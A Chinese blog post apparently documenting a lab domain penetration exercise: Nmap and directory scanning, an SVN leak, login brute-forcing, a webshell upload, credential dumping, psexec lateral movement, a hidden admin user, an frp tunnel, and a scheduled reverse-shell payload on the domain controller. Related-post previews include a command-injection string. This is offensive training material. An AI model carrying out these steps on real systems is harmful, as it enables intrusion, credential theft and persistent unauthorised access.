首页 > 其他分享 >【webhack123】域靶场渗透

【webhack123】域靶场渗透

时间:2024-03-17 17:31:36浏览次数:17  
标签:web hackbox 渗透 webhack123 DC tcp Windows 靶场 com

环境部署

攻击机:kali(192.168.101.141)

web服务器:windows(外网ip:192.168.101.139)(内网ip:10.10.10.150)

域控服务器DC:windows 2016(内网ip:10.10.10.149)

一、信息收集

1、在kali中使用Nmap扫描ip和端口

nmap -sT 192.168.101.0/24 扫描网段,获取目标ip

nmap -A 192.168.101.139 扫描目标详细信息

nmap -A
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-05 19:34 CST
Nmap scan report for www.webhack123.com (192.168.101.139)
Host is up (0.0012s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02)
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: \xE7\xAB\x8B\xE5\x88\xBB\xE8\xB4\xB7 - \xE7\xAB\x8B\xE5\x88\xBB\xE8\xB4\xB7
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
3306/tcp open mysql?
3389/tcp open ms-wbt-server?
|_ssl-date: 2024-03-05T11:37:52+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=web.hackbox.com
| Not valid before: 2023-11-12T09:57:27
|_Not valid after: 2024-05-13T09:57:27
| rdp-ntlm-info:
| Target_Name: HACKBOX
| NetBIOS_Domain_Name: HACKBOX
| NetBIOS_Computer_Name: WEB
| DNS_Domain_Name: hackbox.com
| DNS_Computer_Name: web.hackbox.com
| DNS_Tree_Name: hackbox.com
| Product_Version: 6.1.7601
|_ System_Time: 2024-03-05T11:37:31+00:00
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:30:7E:49 (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 210:
|_ Message signing enabled but not required
|_clock-skew: mean: -1h35m59s, deviation: 3h34m39s, median: 0s
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-03-05T11:37:31
|_ start_date: 2024-03-05T11:25:13
|_nbstat: NetBIOS name: WEB, NetBIOS user: <unknown>, NetBIOS MAC: 000c29307e49 (VMware)
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: web
| NetBIOS computer name: WEB\x00
| Domain name: hackbox.com
| Forest name: hackbox.com
| FQDN: web.hackbox.com
|_ System time: 2024-03-05T19:37:31+08:00

TRACEROUTE
HOP RTT ADDRESS
1 1.21 ms www.webhack123.com (192.168.101.139)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 202.81 seconds

此处扫描出web服务的版本信息

此处扫描出域名信息

此处扫描出web服务的域名

访问目标ip的80端口,发现禁止访问、尝试修改配置文件,通过域名访问

vim /etc/hosts

192.168.101.139 www.webhack123.com

2、web扫描

appscan

御剑

aux 扫出svn存储库漏洞

dirseach -u http://www.webhack123.com 收集可用url

[20:41:28] 200 -    6KB - /.DS_Store                                        
[20:41:28] 200 -    6KB - /.ds_store
[20:41:30] 200 -  333B  - /.idea/misc.xml                                   
[20:41:30] 200 -  264B  - /.idea/modules.xml                                
[20:41:30] 200 -  180B  - /.idea/vcs.xml                                    
[20:41:30] 200 -   38KB - /.idea/workspace.xml                              
[20:41:32] 200 -    3B  - /.svn/entries  
[20:41:32] 200 -  428KB - /.svn/wc.db

发现/.svn/wc.db是个可下载的文件。下载后可在kali中使用sqlitebrowser wc.db可打开数据库文件,也可以在物理机使用Navicat打开,查看该数据库文件。

发现NODES表中存在log日志文件,且包含登录的账号密码内容,将密码解密后逐个尝试web登录。

发现log文件中的账号为admin,密码解密出来为123456,多次尝试登录后提示密码错误,用户可能修改密码。

多次登录失败,发现登录界面只判断账号密码,验证码没有进行验证。

而登录失败,界面响应"status":0,

故在此使用burp进行密码爆破,推测登录成功的界面响应为"status":1。

获得账号密码,登录系统后台,尝试getshell。

二、GETshell

1、进入系统后台管理界面,熟悉界面,发现系统设置中可以修改允许上传的文件类型,将此处添加php,exe。

2、修改后,即可上传一句话木马和cs的监听木马。

3、上传后访问图片地址,确定文件上传成功,即可使用工具连接。

4、使用蚁剑链接后,发现是system权限账号。

5、通过蚁剑上传msf鉴定木马,web服务器上线。

三、内网信息收集

whoami /fqdn

CN=WEB,CN=Computers,DC=hackbox,DC=com

net time /domain

\\dc.hackbox.com 的当前时间是 2024/3/6 21:17:44

net user /domain

这项请求将在域 hackbox.com 的域控制器处理。

\\dc.hackbox.com 的用户帐户

-------------------------------------------------------------------------------

Administrator Guest krbtgt

web

systeminfo

meterpreter > sysinfo

Computer : WEB

OS : Windows Server 2008 R2 (6.1 Build 7601, Service Pack 1).

Architecture : x64

System Language : zh_CN

Domain : HACKBOX

Logged On Users : 1

Meterpreter : x64/windows

ipconfig /all

Windows IP 配置

主机名 . . . . . . . . . . . . . : web

主 DNS 后缀 . . . . . . . . . . . : hackbox.com

节点类型 . . . . . . . . . . . . : 混合

IP 路由已启用 . . . . . . . . . . : 否

WINS 代理已启用 . . . . . . . . . : 否

DNS 后缀搜索列表 . . . . . . . . : hackbox.com

phpstudy_pro> whoami /priv

特权信息

----------------------

特权名 描述 状态

=============================== ========================== ======

SeAssignPrimaryTokenPrivilege 替换一个进程级令牌 已禁用

SeLockMemoryPrivilege 锁定内存页 已启用

SeIncreaseQuotaPrivilege 为进程调整内存配额 已禁用

SeTcbPrivilege 以操作系统方式执行 已启用

SeSecurityPrivilege 管理审核和安全日志 已禁用

SeTakeOwnershipPrivilege 取得文件或其他对象的所有权 已禁用

SeLoadDriverPrivilege 加载和卸载设备驱动程序 已禁用

SeSystemProfilePrivilege 配置文件系统性能 已启用

SeSystemtimePrivilege 更改系统时间 已禁用

SeProfileSingleProcessPrivilege 配置文件单个进程 已启用

SeIncreaseBasePriorityPrivilege 提高计划优先级 已启用

SeCreatePagefilePrivilege 创建一个页面文件 已启用

SeCreatePermanentPrivilege 创建永久共享对象 已启用

SeBackupPrivilege 备份文件和目录 已禁用

SeRestorePrivilege 还原文件和目录 已禁用

SeShutdownPrivilege 关闭系统 已禁用

SeDebugPrivilege 调试程序 已启用

SeAuditPrivilege 生成安全审核 已启用

SeSystemEnvironmentPrivilege 修改固件环境值 已禁用

SeChangeNotifyPrivilege 绕过遍历检查 已启用

SeUndockPrivilege 从扩展坞上取下计算机 已禁用

SeManageVolumePrivilege 执行卷维护任务 已禁用

SeImpersonatePrivilege 身份验证后模拟客户端 已启用

SeCreateGlobalPrivilege 创建全局对象 已启用

SeIncreaseWorkingSetPrivilege 增加进程工作集 已启用

SeTimeZonePrivilege 更改时区 已启用

SeCreateSymbolicLinkPrivilege 创建符号链接 已启用

nltest /DClist:hackbox.com

获得域“hackbox.com”中 DC 的列表(从“\\dc.hackbox.com”中)。

dc.hackbox.com [PDC] [DS] 站点: Default-First-Site-Name

此命令成功完成

whoami /user

用户信息

----------------

用户名 SID

=================== ========

nt authority\system S-1-5-18

net view /domain

Domain

-------------------------------------------------------------------------------

HACKBOX

命令成功完成。

nslookup -type=SRV _ldap._tcp.hackbox.com

DNS request timed out.

timeout was 2 seconds.

������: UnKnown

Address: 10.10.10.149

_ldap._tcp.hackbox.com SRV service location:

priority = 0

weight = 100

port = 389

svr hostname = dc.hackbox.com

dc.hackbox.com internet address = 10.10.10.149

ping hackbox.com

正在 Ping hackbox.com [10.10.10.149] 具有 32 字节的数据:

来自 10.10.10.149 的回复: 字节=32 时间<1ms TTL=128

来自 10.10.10.149 的回复: 字节=32 时间=1ms TTL=128

来自 10.10.10.149 的回复: 字节=32 时间=1ms TTL=128

来自 10.10.10.149 的回复: 字节=32 时间=1ms TTL=128

10.10.10.149 的 Ping 统计信息:

net share

共享名 资源 注解

-------------------------------------------------------------------------------

C$ C:\ 默认共享

IPC$ 远程 IPC

ADMIN$ C:\Windows 远程管理

命令成功完成。

net view

服务器名称 注解

-------------------------------------------------------------------------------

\\DC

\\WEB

命令成功完成。

四、渗透域控主机,获取DC管理权

通过信息收集,整理部分信息如下:

域名:HACKBOX.com

域控:\\DC 10.10.10.149

域内主机:\\WEB 192.168.101.139 10.10.10.150

1、上线cs监听

由于msf中的mimikatz模块没有抓取到nltm,所以尝试使用getshell时上传的cs监听抓取

2、使用cs抓取NLTM

由于域控管理员未在web服务器主机上登录过,没有抓取到域控的NLTM,此处需要模拟社工手段,让域控管理员在域内主机登录一次后再次抓取。

此时,已成功抓取到域控管理员的NLTM与明文密码。

获取到NTLM值后再次使用net view,获取域内主机,发现获取到了一个新的域内目标主机:域控主机 \\DC

3、横向移动、获取\\DC权限、并创建影子用户

使用cs中的横向移动=>psexec

此时已拥有域控主机的admin权限,虽然没有直接上线DC,但可查看目录

及时创建影子用户,并加入管理员组、避免丢失权限

影子用户创建成功

五、MSF中上线DC

由于\\dc和kali不在同一网段,无法直接通讯。

所以上线dc需要搭建隧道,此处使用frp隧道,将服务器上传至web,默认开启7000端口。

kali配置好反弹端口后,开启客户端:

在DC上运行反弹(reverse_tcp)木马,反弹木马将自己的流量,反弹到WEB(192.168.101.139)的6000端口,经过frp隧道传输,交给kali(192.168.101.141)的9999端口,kali监听自身的9999即可上线DC。

使用kali生成监听DC的反向木马

在cs中将木马上传到\\DC\C$

kali启动监听,监听\\DC反弹,经过frp隧道传入kali的9999端口。

先在WEB服务器上使用\\DC权限,创建\\DC的网络链接

启动定时任务,在web服务器上,远程执行\\DC共享目录中的木马文件

shell at \\DC 17:03 \\DC\C$\DC_rev.exe

反弹成功,\\DC域控主机上线MSF

查看\\DC主机端口信息

六、打开DC远程桌面

1、配置路由、开启代理

由于上线DC时,是基于frp反弹隧道完成的,目前只有DC反弹到kali的路由。所以现在还需要再搭建一条kali到\\DC的路由隧道。此处使用MSF中的autoroute,自动路由。

基于WEB的session,使用autoroute后,就拥有了访问\\DC内网的路由。

2、开启MSF代理 auxiliary/server/socks_proxy,并配置全局代理:setg proxies socks5:127.0.0.1:1080

2、进入\\DC的会话,使用注册表命令开启RDP/3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

3、登录\\DC远程桌面

修改kali的配置文件,修改代理。 配置 /etc/proxychains4.conf文件。

执行命令前加上proxychains即可使用socks5的代理运行命令。

使用kali自带的远程桌面工具登录\\DC

由于登录远程桌面需要账号密码,这里就可以用到之前创建的影子用户。

登录成功

标签:web,hackbox,渗透,webhack123,DC,tcp,Windows,靶场,com
From: https://blog.csdn.net/three_1996/article/details/136785727

相关文章

  • DVWA靶场 之Command Injection。
    说明:这个靶场在虚拟机中,用主机通过靶场的漏洞远程连接虚拟机。命令拼接:|:管道符,直接执行后面的语句。||:前面的语句出错时才执行后面的语句。&:无论前面的语句是真是假都会执行后面的语句。&&:前面的语句为真才执行后面的语句。DVWASecurity:Low创建用户c:127.0.0.1&netuse......
  • pikachu靶场第三关-密码爆破之验证码绕过(on client)(附代码审计)
    源代码如下:if(isset($_POST['submit'])){if($_POST['username']&&$_POST['password']){$username=$_POST['username'];$password=$_POST['password'];$sql="select*......
  • SQL-Labs靶场“32-33”关通关教程
    君衍.一、32关GET单引号闭合宽字节注入1、源码分析2、宽字节注入原理3、联合查询注入4、updatexml报错注入5、floor报错注入二、33关GET单引号addslashes逃逸注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入SQL-Labs靶场通关教程:SQL注入......
  • 一款针对加解密综合利用后渗透工具-DecryptTools
    0x01前言为什么会写这一款综合加解密工具,因为在很多比赛如果算拿下靶标不仅需要获取服务器权限还需要登录网站后台这时候很多系统要么数据库连接字符串加密,要么登陆用户加密而这款工具就是为了解决问题。加解密功能:该工具不仅有解密还提供多种加密方式。配置文件信息功......
  • 零基础自学网络安全 / 网络渗透攻防路线学习方法【建议收藏】
    学前感言:1.这是一条坚持的道路,三分钟的热情可以放弃往下看了.2.多练多想,不要离开了教程什么都不会了.最好看完教程自己独立完成技术方面的开发.3.有时多google,baidu,我们往往都遇不到好心的大神,谁会无聊天天给你做解答.4.遇到实在搞不懂的,可以先放放,以后再来解决.......
  • DVWA 靶场搭建
    文章目录1DVWA简介2DVWA安装1DVWA简介DVWA(DamnVulnerableWebApp)是一个基于“PHP+MySQL”搭建的Web应用程序,皆在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助Web开发者更好地理解Web应用安全防范的过程DVWA一共包括十个模块:(1)BruceForc......
  • Node+Vue毕设购物网站的设计与渗透测试(程序+mysql+Express)
    本系统(程序+源码)带文档lw万字以上 文末可获取本课题的源码和程序系统程序文件列表系统的选题背景和意义选题背景:在电子商务迅猛发展的今天,购物网站已成为人们日常生活的一部分。一个具备良好用户体验、安全可靠的购物网站能够吸引并留住大量用户,对于提升品牌影响力和实......
  • xss.haozi.me靶场“0x0B-0x12”通关教程
    君衍.一、0x0B实体编码绕过二、0x0Cscript绕过三、0x0D注释绕过四、0X0Eſ符号绕过五、0x0F编码解码六、0x10直接执行七、0x11闭合绕过八、0x12闭合绕过一、0x0B实体编码绕过我们首先构造payload进行测试:这里我们可以看到全部转为了大写,查看源码:function......
  • 渗透测试(一) 信息收集
    目录1.1常见的Web渗透信息收集方式1.1.1域名信息收集1.1常见的Web渗透信息收集方式1.1.1域名信息收集1.WHOIS查询WHOIS是一个标准的互联网协议,可用于收集网络注册信息、注册域名、IP地址等信息。简单来说,WHOIS就是一个用于查询域名是否被注册及注册域名详细信息的数......
  • xsslabs靶场
    level1payload:<scirpt>alert(123);</script>从php代码可以看出level1没有对输入的数据进行防御!level2输入level1的payload可以看到输入到input标签中的value值中,所以用'"用来闭合value,用>来闭合input标签payload:'"><script>alert(123)</script>从php代码可以看到l......